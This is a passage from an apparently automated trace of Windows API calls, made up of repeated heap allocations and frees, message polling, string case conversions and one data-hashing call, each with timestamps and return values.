wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.887] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0260.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.888] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.888] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.889] CryptHashData (hHash=0xaa5860, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.893] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.894] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.894] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.894] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.894] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.895] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.895] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.896] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.896] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.896] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, 